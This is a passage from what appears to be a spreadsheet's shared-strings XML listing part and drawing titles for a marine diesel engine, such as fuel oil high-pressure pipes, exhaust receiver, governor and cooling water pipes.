    <t>ARR. OF STAY BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLING OF STAY BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAYBOLTS COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLY NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT, ASSY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPLATE - EXHAUST CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDICATOR CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPLATE-INDICATOR CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRING OF EL.LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL UNIT, CYL. LUB.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE SHOE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLES, MULTICORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE, MULTICORE, TWISTED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF CABLE TRAYS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>U-PROFILE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF INSTRUMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERM.,LIQUID.,STRAIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERM.,DIAL TYPE,STRAIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERM.,LIQUID, ANGLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF PRESSURE GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT, PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVES, NEEDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT, ANGULAR PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVES, NEEDLE W.TEST FL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE TRANSDUCER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE ELBOWS 90 DEG. M/F</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL VALVE, SCREWED CONNE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTABLE ELBOW COUPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJ. STRAIGHT MALE COUPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THROTTLEFREE BANJO COUPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BARS(5-9MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT,ANGULAR, PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL VALVES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE, U-TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENCLOSURE, EMPTY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPERATURE TRANSMITTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENCLOSURE, DIN RAIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROW TERMINAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW-PAN HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON SOCKET HEAD CAP S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RESIST. THERMOMETER PT100</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPERATURE SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RESIST. THERMOM. NICR-NI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER IN LUB. OIL MONITOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER IN OIL MONITORING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT OF RUBBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENCLOSURE, COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING WEAR MONITORING S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING WEAR MONITERING S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE TRAY ACCESSORIES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX. HEAD TAPPING SCREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CLAMP, 1 FLAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP, DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJ. OF CONTR. AIR SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORIFICE PLUG, EXT.THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACME THREADS, NOM.MEAS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACME THREADS,TOLERANCES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT,HEXAGON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL SYSTEM, DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING, COMPR. LEFT-HAND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING MATR.-SECTIONAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING RING FOR SHAFTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF FUEL OIL HP PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HIGH-PRESSURE PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL HP PIPE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL HP PIPE, BEND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL HP PIPE, DOUBLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL HP PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREC. STEEL PIPES W. CERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING RING,SHAFT/BORI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION OF HP PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION, PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL HIGH PRESS.PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREC.STEEL PIPES W. CERT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING-LOADED LEVER CPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDRICAL PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING, EXTENSION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUNTER NUTS F. PULL RODS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING RINGS FOR SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF LOAD TRANSMITTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOAD TRANSMITTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUPLING ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT OF GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRAPH FOR GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRICAL GOV. ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE CONTROL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIN RAIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTIONAL IRON, OTHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BARS(0-4MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTIONAL IRON, ANGLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TAP.DOWELS,VAR.TAPER LGTH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDICATOR COCK-MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDICATOR COCK / VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRIGGER RING AND PICK-UPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WASHERS, HARDENED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF EXHAUST RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPES AND RECEIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0900 EXHAUST RECIEVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS INLET-BOLTED CONN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSPECTION COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOSS F. THERM.,TEST COCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOSS A.COCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MANHOLE COVER EXH. REC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BARS(10-14MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREWS W.SPEC.THREAD TOL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF INSULATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION, MAT/STRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION-MAT/STRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION, MAT/ROLL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION, FOIL/CLOTH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RIVET-BLIND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPENSATOR, GAS TYPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RING FOR GRID</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF HEATING SHIELD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PERFORATED PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING MATERIAL, SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF FORE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT OF FORE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELD-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELD UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELD LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GASKET FOR SHIELD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURNING WHEEL - MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DEAD CENTRE POINTER, ASSY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BARS(15-19MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1872-0150 AXIAL VIBRATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE-STEEL WITH 2 PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHT COUPLINGS,COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRINTED CIRCUITBOARD ASSY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAM LOCK WASHERS, STAINLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION-MAT/ROLL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. CHARGING AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0630 SCAVENGE AIR PI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. 100</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD-ON FLANGES PN 16 / P</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTIONAL IRON, I</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLIND FLANGES PN 16 / PN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES, MAN.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. 50-</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT,ANGULAR,SUNDRY TY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL VALVE-SCREWED CONN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REDUCERS, CONCENTRIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBE OIL PIPE, CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LUBRICATORS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SILK-SCREEN PRINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENCLOSURE, ACCESSORIES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIGHT EMITTING DIODE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.LUB. OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. LUB.OIL BOOSTER UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>KEY DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REDUCING CONNECTION,COMPL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0500 AUXILLIARY BLOW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET CONE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES,TURBOCHARG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BENDS, X DEG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL VALVE, SCREWED CONN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE, SQUARE WITH NECK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVAL BLIND FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOSSES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE FUEL OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN BOX W. LEVEL SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4272-0040 FUEL OIL SY. DR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN UMBRELLA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BENDS 90DEG. W.CERT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL AIR PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL REG. VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4272-0030 FO SYS. BY-PASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL REGULATION VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL VALVE,FLANGE CONN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT,ANGULAR,SECT.IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER PIPE, OUTLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5072-0100 COOLING WATER P</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUTTERFLY VALVE, FL.HOUS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER PIPE, OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BARS(40-49MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-FRESHW. FIXED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALLERY BRACKETS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKET-END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKET-CENTRE-EXH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTIONAL IRON, H</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKET-UPPER-EXH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACK.UPPER-MAN.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BARS(20-29MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKETS+PIPES,LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKET LOWER MAN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT,PARALLEL, PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC SPRINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STANCH.WITH STUD COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASE PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE F.RAILINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR.,LOWER,MAN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RAIL HOLDERS, COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAVENGE AIR CO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER MIST CATC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOLER INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SQUARE STEEL BARS, STAINL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RHS STEEL PIPES RECT. STA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RHS STEEL PIPES, STAINLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BAND STEEL, STAINLESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLIND RIVET, STAINLESS ST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN STARTING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN STARTING V</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC HANDWHEELS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE PIN FOR LOCK. PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PILOT AIR PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CLAMP, 2 FLAPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING AIR DI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER START AIR DISTRIB.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING WASHER FOR NUTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIRE EXTING. IN SCAV. BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING COUPLINGS, COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REDUCING ADAPTER MALE/FEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF FLANGES T.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDICATOR BUTTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RELAY SOCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT., LOCAL CONTROL BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLOTTED CHEESE HEAD SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTER COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERMO RELAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CURCUIT BREAKER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTACTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIME DELAYED RELAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROTARY SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEGEND PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY SIGNS AND THEIR US</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING RAIL, TOP HAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REMOTE CONTROL SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PENDANT CONTROLSTATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE, PIPE DIAGRAMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBOCH. LUB.OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR-COOL.CLEAN.PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PIPES, HEATING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. &amp; COOL. OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESH COOLING WATER PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING WATER PIPES-T.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SW COOLING PIPES, 1 TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALIGN FRAME SECT.ON BEDPL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT PISTON COOL.+OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT THRUST BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC CRANKS.DEFLEKTION,MC-S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR ENGINE INSTALL., MC-S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR INSTAL. TAPERED BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE, INTERFACE UNIT ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALARM SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALARM SYSTEM REQUIREMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL. HEATING CYL.OIL. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL. HEAT TRACING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF EL-WIRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURNING GEAR CONTROL SYST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLING OF PMI SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PMI OFFLINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE, MULTICORE, W. CERT</t>
